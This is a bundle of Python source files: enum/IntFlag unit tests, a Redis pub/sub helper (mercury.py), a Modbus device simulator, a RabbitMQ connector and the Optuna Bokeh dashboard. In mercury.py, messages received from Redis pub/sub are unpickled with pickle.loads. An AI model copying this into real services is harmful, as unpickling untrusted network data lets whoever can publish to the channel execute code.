self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO') def test_repr(self): Perm = self.Perm self.assertEqual(repr(Perm.R), '<Perm.R: 4>') self.assertEqual(repr(Perm.W), '<Perm.W: 2>') self.assertEqual(repr(Perm.X), '<Perm.X: 1>') self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>') self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>') self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>') self.assertEqual(repr(Perm(0)), '<Perm.0: 0>') self.assertEqual(repr(Perm(8)), '<Perm.8: 8>') self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>') self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>') self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>') self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>') self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>') self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>') self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>') self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>') Open = self.Open self.assertEqual(repr(Open.RO), '<Open.RO: 0>') self.assertEqual(repr(Open.WO), '<Open.WO: 1>') self.assertEqual(repr(Open.AC), '<Open.AC: 3>') self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>') self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>') self.assertEqual(repr(Open(4)), '<Open.4: 4>') self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>') self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>') self.assertEqual(repr(~Open.AC), '<Open.CE: -4>') self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>' ) self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>') self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>') def test_or(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual(i | j, i.value | j.value) self.assertEqual((i | j).value, i.value | j.value) self.assertIs(type(i | j), Perm) for j in range(8): self.assertEqual(i | j, i.value | j) self.assertEqual((i | j).value, i.value | j) self.assertIs(type(i | j), Perm) self.assertEqual(j | i, j | i.value) self.assertEqual((j | i).value, j | i.value) self.assertIs(type(j | i), Perm) for i in Perm: self.assertIs(i | i, i) self.assertIs(i | 0, i) self.assertIs(0 | i, i) Open = self.Open self.assertIs(Open.RO | Open.CE, Open.CE) def test_and(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: for j in values: self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j)) self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j)) self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j)) for j in range(8): self.assertEqual(i & j, i.value & j) self.assertEqual((i & j).value, i.value & j) self.assertIs(type(i & j), Perm) self.assertEqual(j & i, j & i.value) self.assertEqual((j & i).value, j & i.value) self.assertIs(type(j & i), Perm) for i in Perm: self.assertIs(i & i, i) self.assertIs(i & 7, i) self.assertIs(7 & i, i) Open = self.Open self.assertIs(Open.RO & Open.CE, Open.RO) def test_xor(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual(i ^ j, i.value ^ j.value) self.assertEqual((i ^ j).value, i.value ^ j.value) self.assertIs(type(i ^ j), Perm) for j in range(8): self.assertEqual(i ^ j, i.value ^ j) self.assertEqual((i ^ j).value, i.value ^ j) self.assertIs(type(i ^ j), Perm) self.assertEqual(j ^ i, j ^ i.value) self.assertEqual((j ^ i).value, j ^ i.value) self.assertIs(type(j ^ i), Perm) for i in Perm: self.assertIs(i ^ 0, i) self.assertIs(0 ^ i, i) Open = self.Open self.assertIs(Open.RO ^ Open.CE, Open.CE) self.assertIs(Open.CE ^ Open.CE, Open.RO) def test_invert(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: self.assertEqual(~i, ~i.value) self.assertEqual((~i).value, ~i.value) self.assertIs(type(~i), Perm) self.assertEqual(~~i, i) for i in Perm: self.assertIs(~~i, i) Open = self.Open self.assertIs(Open.WO & ~Open.WO, Open.RO) self.assertIs((Open.WO | Open.CE) & ~Open.WO, Open.CE) def test_programatic_function_string(self): Perm = IntFlag('Perm', 'R W X') lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_with_start(self): Perm = IntFlag('Perm', 'R W X', start=8) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 8 << i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_list(self): Perm = IntFlag('Perm', ['R', 'W', 'X']) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_iterable(self): Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << 2 * i + 1 e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_from_dict(self): Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32)))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << 2 * i + 1 e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_containment(self): Perm = self.Perm R, W, X = Perm RW = R | W RX = R | X WX = W | X RWX = R | W | X self.assertTrue(R in RW) self.assertTrue(R in RX) self.assertTrue(R in RWX) self.assertTrue(W in RW) self.assertTrue(W in WX) self.assertTrue(W in RWX) self.assertTrue(X in RX) self.assertTrue(X in WX) self.assertTrue(X in RWX) self.assertFalse(R in WX) self.assertFalse(W in RX) self.assertFalse(X in RW) def test_bool(self): Perm = self.Perm for f in Perm: self.assertTrue(f) Open = self.Open for f in Open: self.assertEqual(bool(f.value), bool(f)) @unittest.skipUnless(threading, 'Threading required for this test.') @support.reap_threads def test_unique_composite(self): class TestFlag(IntFlag): one = auto() two = auto() three = auto() four = auto() five = auto() six = auto() seven = auto() eight = auto() def __eq__(self, other): return self is other def __hash__(self): return hash(self._value_) seen = set() failed = False def cycle_enum(): nonlocal failed try: for i in range(256): seen.add(TestFlag(i)) except Exception: failed = True threads = [threading.Thread(target=cycle_enum) for _ in range(8)] with support.start_threads(threads): pass self.assertFalse(failed, 'at least one thread failed while creating composite members') self.assertEqual(256, len(seen), 'too many composite members created') class TestUnique(unittest.TestCase): def test_unique_clean(self): @unique class Clean(Enum): one = 1 two = 'dos' tres = 4.0 @unique class Cleaner(IntEnum): single = 1 double = 2 triple = 3 def test_unique_dirty(self): with self.assertRaisesRegex(ValueError, 'tres.*one'): @unique class Dirty(Enum): one = 1 two = 'dos' tres = 1 with self.assertRaisesRegex(ValueError, 'double.*single.*turkey.*triple'): @unique class Dirtier(IntEnum): single = 1 double = 1 triple = 3 turkey = 3 def test_unique_with_name(self): @unique class Silly(Enum): one = 1 two = 'dos' name = 3 @unique class Sillier(IntEnum): single = 1 name = 2 triple = 3 value = 4 expected_help_output_with_docs = """Help on class Color in module %s: class Color(enum.Enum) | An enumeration. | | Method resolution order: | Color | enum.Enum | builtins.object | | Data and other attributes defined here: | | blue = <Color.blue: 3> | | green = <Color.green: 2> | | red = <Color.red: 1> | | ---------------------------------------------------------------------- | Data descriptors inherited from enum.Enum: | | name | The name of the Enum member. | | value | The value of the Enum member. | | ---------------------------------------------------------------------- | Data descriptors inherited from enum.EnumMeta: | | __members__ | Returns a mapping of member name->value. | | This mapping lists all enum members, including aliases. Note that this | is a read-only view of the internal mapping.""" expected_help_output_without_docs = """Help on class Color in module %s: class Color(enum.Enum) | Method resolution order: | Color | enum.Enum | builtins.object | | Data and other attributes defined here: | | blue = <Color.blue: 3> | | green = <Color.green: 2> | | red = <Color.red: 1> | | ---------------------------------------------------------------------- | Data descriptors inherited from enum.Enum: | | name | | value | | ---------------------------------------------------------------------- | Data descriptors inherited from enum.EnumMeta: | | __members__""" class TestStdLib(unittest.TestCase): maxDiff = None class Color(Enum): red = 1 green = 2 blue = 3 def test_pydoc(self): if StrEnum.__doc__ is None: expected_text = expected_help_output_without_docs % __name__ else: expected_text = expected_help_output_with_docs % __name__ output = StringIO() helper = pydoc.Helper(output=output) helper(self.Color) result = output.getvalue().strip() self.assertEqual(result, expected_text) def test_inspect_getmembers(self): values = dict((('__class__', EnumMeta), ('__doc__', 'An enumeration.'), ('__members__', self.Color.__members__), ( '__module__', __name__), ('blue', self.Color.blue), ('green', self.Color.green), ('name', Enum.__dict__['name']), ('red', self.Color.red), ('value', Enum.__dict__['value']))) result = dict(inspect.getmembers(self.Color)) self.assertEqual(values.keys(), result.keys()) failed = False for k in values.keys(): if result[k] != values[k]: print() print( '\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' % ('=' * 75, k, result[k], values[k], '=' * 75), sep='') failed = True if failed: self.fail('result does not equal expected, see print above') def test_inspect_classify_class_attrs(self): from inspect import Attribute values = [Attribute(name='__class__', kind='data', defining_class= object, object=EnumMeta), Attribute(name='__doc__', kind='data', defining_class=self.Color, object='An enumeration.'), Attribute (name='__members__', kind='property', defining_class=EnumMeta, object=EnumMeta.__members__), Attribute(name='__module__', kind ='data', defining_class=self.Color, object=__name__), Attribute (name='blue', kind='data', defining_class=self.Color, object= self.Color.blue), Attribute(name='green', kind='data', defining_class=self.Color, object=self.Color.green), Attribute( name='red', kind='data', defining_class=self.Color, object=self .Color.red), Attribute(name='name', kind='data', defining_class =Enum, object=Enum.__dict__['name']), Attribute(name='value', kind='data', defining_class=Enum, object=Enum.__dict__['value'])] values.sort(key=lambda item: item.name) result = list(inspect.classify_class_attrs(self.Color)) result.sort(key=lambda item: item.name) failed = False for v, r in zip(values, result): if r != v: print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='' ) failed = True if failed: self.fail('result does not equal expected, see print above') class MiscTestCase(unittest.TestCase): def test__all__(self): support.check__all__(self, enum) CONVERT_TEST_NAME_D = 5 CONVERT_TEST_NAME_C = 5 CONVERT_TEST_NAME_B = 5 CONVERT_TEST_NAME_A = 5 CONVERT_TEST_NAME_E = 5 CONVERT_TEST_NAME_F = 5 class TestIntEnumConvert(unittest.TestCase): def test_convert_value_lookup_priority(self): test_type = enum.IntEnum._convert('UnittestConvert', ( 'test.test_enum', '__main__')[__name__ == '__main__'], filter= lambda x: x.startswith('CONVERT_TEST_')) self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A') def test_convert(self): test_type = enum.IntEnum._convert('UnittestConvert', ( 'test.test_enum', '__main__')[__name__ == '__main__'], filter= lambda x: x.startswith('CONVERT_TEST_')) self.assertEqual(test_type.CONVERT_TEST_NAME_F, test_type. CONVERT_TEST_NAME_A) self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5) self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5) self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5) self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5) self.assertEqual([name for name in dir(test_type) if name[0:2] not in ('CO', '__')], [], msg='Names other than CONVERT_TEST_* found.') if __name__ == '__main__': unittest.main()
mercury.py
# coding: utf-8 import redis import pickle import logging # 设置屏幕输出句柄 logger = logging.getLogger("mercury") logger.setLevel(logging.DEBUG) class RedisNotConnected(BaseException): def __init__(self, host, port): err = "Error connecting to redis {}:{}".format(host, port) super().__init__(err) class Singleton(type): _instances = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs) return cls._instances[cls] class MercuryApp(metaclass=Singleton): """ A MercuryApp is a Singleton """ def __init__( self, name=None, redis_host="localhost", port=6379, redis_password=None ): super().__init__() try: self.__redis = redis.StrictRedis( host=redis_host, port=port, password=redis_password, decode_responses=True, socket_connect_timeout=3 ) if name is None: import hashlib import time import random name = hashlib.md5() name.update(str(time.time()+random.random()).encode()) name = name.hexdigest() self.__redis.client_setname(name) self.name = name self.__redis.client_list() self.__pubsub = self.__redis.pubsub() self.__handlers = {} self.started = False except Exception as e: logger.error("{}".format(e)) raise RedisNotConnected(host=redis_host, port=port) def add_handler(self, channel, handler): self.__handlers[channel] = handler def publish(self, channel, message): self.__redis.publish(channel, pickle.dumps(message)) def subscribe(self, channel): self.__pubsub.subscribe(channel) def psubscribe(self, pattern): self.__pubsub.psubscribe(pattern) def on_message(self, msg): print("on_message:", msg) def start(self): """ Start a thread, keep delivering messages to handlers :return: """ import threading threading.Thread(target=self.run_in_thread, daemon=True).start() def run_in_thread(self): while True: self.__next__() def __iter__(self): return self def __next__(self): msg = self.__pubsub.get_message(timeout=5) if msg is not None: if msg['type'] == 'message' or msg['type'] == 'pmessage': data = None try: data = pickle.loads(msg['data']) except TypeError: logger.error("Unexpected Message Type Received: {}, a pickled bytes is required".format(msg['data'])) if data: if msg["channel"] in self.__handlers: handler = self.__handlers[msg["channel"]] handler(data) else: self.on_message(data) return data
server.py
#Import pymodbus components from pymodbus.server.sync import StartTcpServer, StartSerialServer from pymodbus.device import ModbusDeviceIdentification from pymodbus.datastore import ModbusSequentialDataBlock, ModbusSparseDataBlock from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext from pymodbus.transaction import ModbusRtuFramer #Import local scripts componenets import xml.etree.ElementTree as ET from threading import Thread import time, logging, sys from client import validateXml class Server: """Server simulator that serves on given ip and port and generates signals based on xml file""" def __init__(self, xmlFile): self.xml = xmlFile validationInt = validateXml(self.xml) if validationInt == -1: raise Exception('XML File Error: devicData node missing') elif validationInt == -2: raise Exception('XML File Error: modbus type not set') elif validationInt == -3: raise Exception('XML File Error: ip address missing') elif validationInt == -4: raise Exception('XML File Error: comm port missing') elif validationInt == -5: raise Exception('XML File Error: baud rate missing') elif validationInt == -10: raise Exception('XML File Error: No register mappings') elif validationInt == -11: raise Exception('XML File Error: Duplicated Input register mapping') elif validationInt == -12: raise Exception('XML File Error: Duplicated Discrete input mapping') elif validationInt == -13: raise Exception('XML File Error: Duplicated Holding register mapping') elif validationInt == -14: raise Exception('XML File Error: Duplicated Coil mapping') self.xmlData = self._parseXml() store = ModbusSlaveContext( di=ModbusSequentialDataBlock(0, self.xmlData.get('registers').get('di')), ir=ModbusSequentialDataBlock(0, self.xmlData.get('registers').get('ir')), co=ModbusSequentialDataBlock(0, self.xmlData.get('registers').get('co')), hr=ModbusSequentialDataBlock(0, self.xmlData.get('registers').get('hr')), zero_mode=True) self.context = ModbusServerContext(slaves=store, single=True) self.deviceIdentity = ModbusDeviceIdentification() self.deviceIdentity.VendorName = self.xmlData.get("vendorName") self.deviceIdentity.ProductCode = self.xmlData.get("productCode") self.deviceIdentity.VendorUrl = self.xmlData.get("vendorUrl") self.deviceIdentity.ProductName = self.xmlData.get("productName") self.deviceIdentity.ModelName = self.xmlData.get("modelName") self.deviceIdentity.MajorMinorRevision = self.xmlData.get("Version") def _parseXml(self): """Parses xml file and validates the registers""" data = {} tree = ET.parse(self.xml) root = tree.getroot() registers = root.find('registers') #Discrete inputs (booleans) diNode = registers.find('di') if diNode != None: di = [0]*65535 for mapping in diNode.findall('mapping'): ix = int(mapping.get('register')) if mapping.get('initialValue') != None: di[ix] = int(mapping.get('initialValue')) else: di = [0] #Input registers (analogs) irNode = registers.find('ir') if irNode != None: ir = [0]*65535 for mapping in irNode.findall('mapping'): ix = int(mapping.get('register')) if mapping.get('initialValue') != None: ir[ix] = int(mapping.get('initialValue')) else: ir = [0] #Holding registers (analogs) hrNode = registers.find('hr') if hrNode != None: hr = [0]*65535 for mapping in hrNode.findall('mapping'): ix = int(mapping.get('register')) if mapping.get('initialValue') != None: hr[ix] = int(mapping.get('initialValue')) else: hr = [0] #Coils (booleans) coNode = registers.find('co') if coNode != None: co = [0]*65535 for mapping in coNode.findall('mapping'): ix = int(mapping.get('register')) if mapping.get('initialValue') != None: co[ix] = int(mapping.get('initialValue')) else: co = [0] data['registers'] = { 'di' : di, 'ir' : ir, 'hr' : hr, 'co' : co } #Parse device data deviceData = root.find('deviceData') data['vendorName'] = deviceData.get("vendorName", '') data['productCode'] = deviceData.get("productCode", '') data['vendorUrl'] = deviceData.get("vendorUrl", '') data['productName'] = deviceData.get("productName", '') data['modelName'] = deviceData.get("modelName", '') data['version'] = deviceData.get("version", '0.0-1') data['modbusType'] = deviceData.get('modbusType') data['com'] = deviceData.get("com", None) data['baud'] = int(deviceData.get("baud", "9600")) data['stopbits'] = int(deviceData.get("stopbits", "1")) data['bytesize'] = int(deviceData.get("bytesize", "8")) data['parity'] = deviceData.get("parity", "E") data['ip'] = deviceData.get("ip", "localhost") data['port'] = int(deviceData.get("port", 502)) data['timeout'] = int(deviceData.get('timeout', "2")) return data def run_server(self, callback=None, debug = True): """Runs the modbus tcp or rtu server with given register information. if increment is true, the register values are dynamic and incrementing by one every interval provided in cycle_s argument""" if debug: logging.basicConfig() log = logging.getLogger() log.setLevel(logging.DEBUG) try: #Data callback function will be executed as a separate thread if callback != None: thread = Thread(target=callback, args=(self.context,), daemon=True) thread.start() if self.xmlData.get('modbusType') == 'tcp/ip': print(f"Running server on IP: {self.xmlData.get('ip')} and port {self.xmlData.get('port')}") StartTcpServer(self.context, identity=self.deviceIdentity, address=(self.xmlData.get('ip'), self.xmlData.get('port'))) elif self.xmlData.get('modbusType') == 'rtu': print(f"Running server on COM: {self.xmlData.get('com')} and baudrate {self.xmlData.get('baud')}") StartSerialServer(self.context, timeout=self.xmlData.get('timeout'), framer=ModbusRtuFramer, identity=self.deviceIdentity, port=self.xmlData.get('com'), stopbits=self.xmlData.get('stopbits'), bytesize=self.xmlData.get('bytesize'), parity=self.xmlData.get('parity'), baudrate=self.xmlData.get('baud')) except KeyboardInterrupt: print('Server stopped') #Helpfull data simulators def incrementer(context): """ A worker process that runs on a given cycle and updates live values of the context. """ while True: updateStartTime = time.perf_counter() #Get values from only the first slave/ multiple slaves unsupported #Toggle values of coils and digital inputs di_values = context[0].getValues(2, 0, count=65535) new_values = [v - 1 if v == 1 else v + 1 for v in di_values] context[0].setValues(2, 0, new_values) co_values = context[0].getValues(1, 0, count=65535) new_values = [v - 1 if v == 1 else v + 1 for v in co_values] context[0].setValues(1, 0, new_values) hr_values = context[0].getValues(3, 0, count=65535) new_values = [v + 1 for v in hr_values] context[0].setValues(3, 0, new_values) ir_values = context[0].getValues(4, 0, count=65535) new_values = [v + 1 for v in ir_values] context[0].setValues(4, 0, new_values) #Calculate the latency latency_ms = int((time.perf_counter() - updateStartTime) * 1000) #if cycle time is faster than latency, go to sleep to match the cycle time if latency_ms < 2000: time.sleep((2000 - latency_ms) / 1000) ####MAIN APP####### if __name__ == '__main__': #handle arguments to the script #Default arguments increment = False debug = False callback = None opts = [opt for opt in sys.argv[1:] if opt.startswith("-")] args = [arg for arg in sys.argv[1:] if not arg.startswith("-")] #xml file path must be first xmlFilePath = args[0] if '-i' in opts: callback = incrementer if '--increment' in opts: callback = incrementer if '-d' in opts: debug = True if '--debug' in opts: debug = True sim = Server(xmlFilePath) sim.run_server(callback=callback, debug=debug)
rabbit.py
# -*- coding: utf-8 -*- """ Created on 21 August 2017 @author: dgrossman """ import logging import threading import time from functools import partial import pika class Rabbit: ''' Base Class for RabbitMQ ''' def __init__(self): self.logger = logging.getLogger('rabbit') self.connection = None self.channel = None self.mq_recv_thread = None self.queue_name = 'poseidon_main' def close(self): if self.connection: self.connection.close() def make_rabbit_connection(self, host, port, exchange, keys, total_sleep=float('inf')): # pragma: no cover ''' Connects to rabbitmq using the given hostname, exchange, and queue. Retries on failure until success. Binds routing keys appropriate for module, and returns the channel and connection. ''' wait = True do_rabbit = True while wait and total_sleep > 0: try: # Starting rabbit connection self.connection = pika.BlockingConnection( pika.ConnectionParameters(host=host, port=port) ) self.channel = self.connection.channel() self.channel.exchange_declare( exchange=exchange, exchange_type='topic') self.channel.queue_declare( queue=self.queue_name, exclusive=False, durable=True) self.logger.info(f'Connected to {host} rabbitmq...') wait = False except Exception as e: self.logger.debug( f'Waiting for connection to {host} rabbitmq...') time.sleep(2) total_sleep -= 2 wait = True if wait: do_rabbit = False if self.channel is not None and isinstance(keys, list) and not wait: for key in keys: self.logger.debug( f'Array adding key:{key} to rabbitmq channel') self.channel.queue_bind( exchange=exchange, queue=self.queue_name, routing_key=key) if isinstance(keys, str) and not wait: self.logger.debug( f'String adding key:{keys} to rabbitmq channel') self.channel.queue_bind( exchange=exchange, queue=self.queue_name, routing_key=keys) return do_rabbit def start_channel(self, mycallback, m_queue): ''' Handle threading for messagetype ''' self.logger.debug(f'About to start channel {self.channel}') self.channel.basic_consume( self.queue_name, partial(mycallback, q=m_queue)) self.mq_recv_thread = threading.Thread( target=self.channel.start_consuming) self.mq_recv_thread.start()
dashboard.py
try: import bokeh.command.bootstrap import bokeh.document # NOQA import bokeh.layouts import bokeh.models import bokeh.models.widgets import bokeh.plotting import bokeh.themes import tornado.gen _available = True except ImportError as e: _available = False _import_error = e import collections import threading import time import numpy as np import optuna.logging import optuna.structs import optuna.study from optuna import type_checking if type_checking.TYPE_CHECKING: from typing import Any # NOQA from typing import Dict # NOQA from typing import List # NOQA from typing import Optional # NOQA _mode = None # type: Optional[str] _study = None # type: Optional[optuna.study.Study] _HEADER_FORMAT = """ <style> body {{ margin: 20px; }} h1, p {{ margin: 10px 0px; }} </style> <h1>Optuna Dashboard (Beta)</h1> <p> <b>Study name:</b> {study_name}<br> </p> """ _DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S" if _available: class _CompleteTrialsWidget(object): def __init__(self, trials, direction): # type: (List[optuna.structs.FrozenTrial], optuna.structs.StudyDirection) -> None complete_trials = [ trial for trial in trials if trial.state == optuna.structs.TrialState.COMPLETE ] self.trial_ids = set([trial._trial_id for trial in complete_trials]) self.direction = direction values = [trial.value for trial in complete_trials] if direction == optuna.structs.StudyDirection.MINIMIZE: best_values = np.minimum.accumulate(values, axis=0) else: best_values = np.maximum.accumulate(values, axis=0) self.cds = bokeh.models.ColumnDataSource( { "#": list(range(len(complete_trials))), "value": values, "best_value": best_values, } ) self.best_value = best_values[-1] if complete_trials else np.inf def create_figure(self): # type: () -> bokeh.plotting.Figure figure = bokeh.plotting.figure(height=150) figure.circle(x="#", y="value", source=self.cds, alpha=0.3, color="navy") figure.line(x="#", y="best_value", source=self.cds, color="firebrick") figure.xaxis[0].axis_label = "Number of Trials" figure.yaxis[0].axis_label = "Objective Value" return figure def update(self, new_trials): # type: (List[optuna.structs.FrozenTrial]) -> None stream_dict = collections.defaultdict(list) # type: Dict[str, List[Any]] for trial in new_trials: if trial.state != optuna.structs.TrialState.COMPLETE: continue if trial._trial_id in self.trial_ids: continue stream_dict["#"].append(len(self.trial_ids)) stream_dict["value"].append(trial.value) if self.direction == optuna.structs.StudyDirection.MINIMIZE: self.best_value = min(self.best_value, trial.value) else: self.best_value = max(self.best_value, trial.value) stream_dict["best_value"].append(self.best_value) self.trial_ids.add(trial._trial_id) if stream_dict: self.cds.stream(stream_dict) class _AllTrialsWidget(object): def __init__(self, trials): # type: (List[optuna.structs.FrozenTrial]) -> None self.cds = bokeh.models.ColumnDataSource(self.trials_to_dict(trials)) def create_table(self): # type: () -> bokeh.models.widgets.DataTable return bokeh.models.widgets.DataTable( source=self.cds, columns=[ bokeh.models.widgets.TableColumn(field=field, title=field) for field in [ "number", "state", "value", "params", "datetime_start", "datetime_complete", ] ], ) def update( self, old_trials, # type: List[optuna.structs.FrozenTrial] new_trials, # type: List[optuna.structs.FrozenTrial] ): # type: (...) -> None modified_indices = [] modified_trials = [] for i, old_trial in enumerate(old_trials): new_trial = new_trials[i] if old_trial != new_trial: modified_indices.append(i) modified_trials.append(new_trial) patch_dict = self.trials_to_dict(modified_trials) patch_dict = {k: list(zip(modified_indices, v)) for k, v in patch_dict.items()} self.cds.patch(patch_dict) self.cds.stream(self.trials_to_dict(new_trials[len(old_trials) :])) @staticmethod def trials_to_dict(trials): # type: (List[optuna.structs.FrozenTrial]) -> Dict[str, List[Any]] return { "number": [trial.number for trial in trials], "state": [trial.state.name for trial in trials], "value": [trial.value for trial in trials], "params": [str(trial.params) for trial in trials], "datetime_start": [ trial.datetime_start.strftime(_DATETIME_FORMAT) if trial.datetime_start is not None else None for trial in trials ], "datetime_complete": [ trial.datetime_complete.strftime(_DATETIME_FORMAT) if trial.datetime_complete is not None else None for trial in trials ], } class _DashboardApp(object): def __init__(self, study, launch_update_thread): # type: (optuna.study.Study, bool) -> None self.study = study self.launch_update_thread = launch_update_thread self.lock = threading.Lock() def __call__(self, doc): # type: (bokeh.document.Document) -> None self.doc = doc self.current_trials = ( self.study.trials ) # type: Optional[List[optuna.structs.FrozenTrial]] self.new_trials = None # type: Optional[List[optuna.structs.FrozenTrial]] self.complete_trials_widget = _CompleteTrialsWidget( self.current_trials, self.study.direction ) self.all_trials_widget = _AllTrialsWidget(self.current_trials) self.doc.title = "Optuna Dashboard (Beta)" header = _HEADER_FORMAT.format(study_name=self.study.study_name) self.doc.add_root( bokeh.layouts.layout( [ [bokeh.models.widgets.Div(text=header)], [self.complete_trials_widget.create_figure()], [self.all_trials_widget.create_table()], ], sizing_mode="scale_width", ) ) if self.launch_update_thread: thread = threading.Thread(target=self.thread_loop) thread.daemon = True thread.start() def thread_loop(self): # type: () -> None while True: time.sleep(1) new_trials = self.study.trials with self.lock: need_to_add_callback = self.new_trials is None self.new_trials = new_trials if need_to_add_callback: self.doc.add_next_tick_callback(self.update_callback) @tornado.gen.coroutine def update_callback(self): # type: () -> None with self.lock: current_trials = self.current_trials new_trials = self.new_trials self.current_trials = self.new_trials self.new_trials = None assert current_trials is not None assert new_trials is not None self.complete_trials_widget.update(new_trials) self.all_trials_widget.update(current_trials, new_trials) def _check_bokeh_availability(): # type: () -> None if not _available: raise ImportError( "Bokeh is not available. Please install Bokeh to use the dashboard. " "Bokeh can be installed by executing `$ pip install bokeh`. " "For further information, please refer to the installation guide of Bokeh. " "(The actual import error is as follows: " + str(_import_error) + ")" ) def _show_experimental_warning(): # type: () -> None logger = optuna.logging.get_logger(__name__) logger.warning("Optuna dashboard is still highly experimental. Please use with caution!") def _get_this_source_path(): # type: () -> str path = __file__ # Sometimes __file__ points to a *.pyc file, but Bokeh doesn't accept it. if path.endswith(".pyc"): path = path[:-1] return path def _serve(study, bokeh_allow_websocket_origins): # type: (optuna.study.Study, List[str]) -> None global _mode, _study _check_bokeh_availability() _show_experimental_warning() # We want to pass the mode (launching a server? or, just writing an HTML?) and a target study # to our Bokeh app. Unfortunately, as we are using `bokeh.command.bootstrap.main` to launch # our Bokeh app, we cannot directly pass Python objects to it. Therefore, we have no choice but # to use global variables to pass them. _mode = "serve" _study = study # TODO(akiba): Stop using Bokeh's CLI entry point, and start the HTTP server by ourselves. # This is not a very clean way to launch Bokeh server. # Another seemingly better way is to # instantiate and launch `bokeh.server.server.Server` by ourselves. However, in this way, # for some reason, we found that the CDS update is not reflected to browsers, at least on Bokeh # version 0.12.15. In addition, we will need to do many configuration to servers, which can be # done automatically with the following one line. So, for now, we decided to use this way. command = ["bokeh", "serve", "--show", _get_this_source_path()] for bokeh_allow_websocket_origin in bokeh_allow_websocket_origins: command.extend(["--allow-websocket-origin", bokeh_allow_websocket_origin]) bokeh.command.bootstrap.main(command) def _write(study, out_path): # type: (optuna.study.Study, str) -> None global _mode, _study _check_bokeh_availability() _show_experimental_warning() _mode = "html" _study = study bokeh.command.bootstrap.main(["bokeh", "html", _get_this_source_path(), "-o", out_path]) def _run(): # type: () -> None # Please note that `_study` and `optuna.dashboard._study` are different here. Here, this module # is loaded inside Bokeh, and thus it is not `optuna.dashboard`, but `bk_script_????`. study = optuna.dashboard._study mode = optuna.dashboard._mode assert study is not None app = _DashboardApp(study, launch_update_thread=(mode == "serve")) doc = bokeh.plotting.curdoc() app(doc) if __name__.startswith("bk_script_"): # Here, this module is loaded inside Bokeh. Therefore, we should launch the Bokeh app. _run()
conftest.py
